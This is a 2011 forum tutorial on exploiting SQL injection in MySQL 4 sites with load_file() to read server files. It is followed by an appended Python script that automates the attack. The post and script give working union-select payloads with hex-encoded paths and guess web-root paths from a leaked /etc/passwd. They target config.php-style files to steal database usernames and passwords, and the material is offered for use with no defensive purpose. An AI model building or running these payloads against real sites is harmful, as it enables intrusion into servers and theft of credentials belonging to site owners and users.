denjacker Posted June 14, 2011

Hey, I've decided to write this little tutorial to let people understand how load_file() works, because it seems everyone here is scared of MySQL version 4.

What is load_file()?

Syntax:
load_file('/blah/blah.php')

It is a built-in MySQL function that reads a file from the database server's filesystem and returns its contents as a string. It needs the FILE privilege, the file has to be readable by the OS user that mysqld runs as, and it has to be smaller than max_allowed_packet; if any of that fails the function just returns NULL, not an error, so an empty result does not mean the path is wrong. (Newer MySQL releases also have the secure_file_priv setting, which limits which directories it may read from; MySQL 4 has no such thing.) On a typical shared host the web server and MySQL run on the same box and the site connects with a privileged account, which is why this is the best way to attack sites running MySQL version 4, where there is no information_schema to enumerate tables from.

This is just an example on a UNIX system with PHP files, but if you find such a vulnerability you can do many things, like:
- read .htpasswd files, or read PHP files as source without executing them
- bypass directory listing restrictions and .htaccess
- read UNIX files under /etc/, like /etc/passwd
And many many more...

But not all SQLi sites are vulnerable to load_file() (most hosts do not give the web application's MySQL user the FILE privilege), so it is kind of a rare thing.

First, when you have found a site vulnerable to SQLi, select the largest column possible (a column that shows a lot of text), because load_file() returns the whole file in one string and a column rendered in a small spot will cut it off. Here is our visible column: (screenshot)

Second, to execute load_file() in the URL you need to hex the path, because if we put load_file('/blah/blah.php') into the URL the quotes get escaped or filtered (magic_quotes, addslashes and the like) and the query breaks. A hex literal contains no quotes at all, and MySQL treats it as a string.

For example
/etc/passwd
in hex is:
2f6574632f706173737764

So you should execute it like this:
php?id=1 union select load_file(0x2f6574632f706173737764)--

(Notice: you must put "0x" before the hex to let MySQL understand that it is not normal input but a hex literal. Also, your union select must have exactly as many columns as the original query, so put load_file() in the column that is displayed and fill the rest with 1,2,3 or null. And MySQL requires a space after "--", which a URL tends to lose, so write "-- -" or "--+" at the end.)

After you execute it, it should output the /etc/passwd file, where you can find your target's directories. As you see, on this screenshot it shows us the directory for the site somesite.com:
/home/webmaster/www/somesite.com

If it does not show the path anywhere (not even in a MySQL error message while you are injecting, or somewhere else), you can guess it yourself. For example, if you SQLi the site "blah.net", you can try /home/webmaster/www/blah.net, or /home/webmaster/public_html/blah.net, or /home/webmaster/http/blah etc. Remember that a wrong or unreadable guess just comes back as NULL, so keep trying.

Third, once you have found the site path, scan the site with Acunetix or other software to find filenames on this site.
For example, it could be index.php or sensitive directories like /includes (it often holds the MySQL username and password in plain text). In my example, I found directory /includes.

The target file for the MySQL username and password is usually config.php or config.inc.php or config.new.php. It depends on what kind of software the site uses. If it uses WordPress or Joomla or vBulletin, phpBB or some other crap, it is easy to find the right path and name for this file (or any other file you want to dump :)).

Last step: just hex the path to the file again and execute it the same way: (screenshot)

Hope this helps!
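The whole procedure above as a small helper script. This is an added example written for this page, not code from the original post: it hexes the path, builds the union payload with load_file() in the displayed column, and then turns a leaked /etc/passwd into the /home/<user>/{www,public_html,http}/<site>/includes/config*.php guesses the post describes. Assumptions that are not in the post: the injectable parameter is a numeric id in a hypothetical page.php, the original query has `columns` columns of which `visible` is rendered, and the /etc/passwd text below is constructed here, not taken from any real host.

```python
# Added example for the load_file() procedure on this page. Not from the
# original post. Assumptions (not in the post): numeric `id` parameter on
# a hypothetical page.php, `columns`/`visible` describe the original query,
# and SAMPLE_PASSWD is constructed, not captured from a real system.
from urllib.parse import quote

CONFIG_NAMES = ("config.php", "config.inc.php", "config.new.php")
DOCROOT_LAYOUTS = ("www", "public_html", "http")


def hex_literal(path: str) -> str:
    """MySQL hex string literal for `path`: it contains no quotes, so
    magic_quotes/addslashes have nothing to escape."""
    return "0x" + path.encode("utf-8").hex()


def union_payload(path: str, columns: int, visible: int) -> str:
    """`1 union select ...` with load_file() in the displayed column.
    The union needs exactly as many columns as the original query, so the
    other slots are padded with NULL. `-- -` is used instead of a bare `--`
    because MySQL needs whitespace after `--` and a trailing space is
    easily lost from a URL."""
    if not 1 <= visible <= columns:
        raise ValueError("visible column must be within 1..columns")
    slots = ["null"] * columns
    slots[visible - 1] = f"load_file({hex_literal(path)})"
    return f"1 union select {','.join(slots)}-- -"


def injection_url(base: str, param: str, path: str, columns: int, visible: int) -> str:
    """Full GET URL; only the characters MySQL needs are left unescaped."""
    payload = union_payload(path, columns, visible)
    return f"{base}?{param}={quote(payload, safe='(),-')}"


# Constructed sample of what a leaked /etc/passwd might look like.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:105:110:MySQL Server,,,:/nonexistent:/bin/false
webmaster:x:1001:1001:,,,:/home/webmaster:/bin/bash
"""


def home_dirs(passwd_text: str, min_uid: int = 1000):
    """(user, home) pairs for real login accounts in /etc/passwd output:
    uid at or above `min_uid` and a usable shell. System accounts are
    skipped; the interesting homes are where /home/<user>/www/<site> lives."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed or truncated line (e.g. cut off by a short column)
        user, _pw, uid, _gid, _gecos, home, shell = fields
        if uid.isdigit() and int(uid) >= min_uid and not shell.endswith(("nologin", "false")):
            found.append((user, home))
    return found


def candidate_paths(site: str, homes, subdir: str = "includes", names=CONFIG_NAMES):
    """The path guesses from the post (/home/<user>/{www,public_html,http}/<site>)
    combined with the usual config file names under `subdir`. Every one of
    these is a separate load_file() attempt; a miss simply returns NULL."""
    return [
        f"{home}/{layout}/{site}/{subdir}/{name}"
        for _user, home in homes
        for layout in DOCROOT_LAYOUTS
        for name in names
    ]


if __name__ == "__main__":
    print(injection_url("http://somesite.com/page.php", "id", "/etc/passwd", 3, 2))
    for p in candidate_paths("somesite.com", home_dirs(SAMPLE_PASSWD)):
        print(p, "->", hex_literal(p))
```

hex_literal("/etc/passwd") gives the same 0x2f6574632f706173737764 the post uses; feed each candidate's hex literal back through union_payload() for the last step.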